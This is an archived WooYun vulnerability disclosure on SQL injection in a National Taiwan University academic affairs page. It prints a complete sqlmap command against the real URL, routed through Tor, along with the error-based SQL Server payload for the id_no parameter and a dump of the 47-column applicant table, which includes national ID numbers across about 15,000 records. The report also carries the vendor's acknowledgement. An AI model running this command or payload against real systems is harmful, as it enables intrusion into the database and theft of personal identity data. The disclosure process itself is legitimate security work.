乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-26: 细节已通知厂商并且等待厂商处理中 2015-07-27: 厂商已经确认,细节仅向厂商公开 2015-08-06: 细节向核心白帽子及相关领域专家公开 2015-08-16: 细节向普通白帽子公开 2015-08-26: 细节向实习白帽子公开 2015-09-10: 细节向公众公开
台湾國立臺灣大學教務處SQL注入影响上万用户,应该包括身份证资料
./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=E --union-char=n -u "http://gra103.aca.ntu.edu.tw/cpt/queryall/default.asp" --data="id_no=A180193569&byear=&bmon=&bday=&cptquery=%ACd%B8%DF" -p id_no -D HWTEST -T cpt --columns
Parameter: id_no (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: id_no=A180193569' AND 4827=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113)+(SELECT (CASE WHEN (4827=4827) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(120)+CHAR(120)+CHAR(113))) AND 'pGNN'='pGNN&byear=&bmon=&bday=&cptquery=%ACd%B8%DF
Table: cpt[47 columns]+-----------+----------+| Column | Type |+-----------+----------+| account | varchar || addr | varchar || agree1 | varchar || agree2 | varchar || area | varchar || b_area | varchar || b_country | nvarchar || b_date | varchar || chk_paid | varchar || chk_price | int || cname | nvarchar || email | varchar || ename | nvarchar || exam1 | varchar || exam2 | varchar || exam3 | varchar || exam4 | varchar || exam5 | varchar || g_dept | nvarchar || g_other | nvarchar || g_sch | nvarchar || g_type | nvarchar || g_year | nvarchar || id | varchar || id_no | varchar | ====>身份证| job | nvarchar || jobtitle | nvarchar || jobtype | nvarchar || nati_doc | varchar || nati_no | varchar || now | varchar || paid | varchar || price | int || r_letter | varchar || sex | varchar || special0 | varchar || special1 | varchar || special2 | varchar || special3 | varchar || t_addr1 | varchar || t_addr2 | varchar || TEL1 | varchar || TEL2 | varchar || TEL3 | varchar || test_area | varchar || test_yy | nvarchar || vet | varchar |+-----------+----------+Database: HWTEST+---------+---------+| Table | Entries |+---------+---------+| dbo.cpt | 14957 |+---------+---------+
过滤
危害等级:高
漏洞Rank:18
确认时间:2015-07-27 18:23
感謝通知!
暂无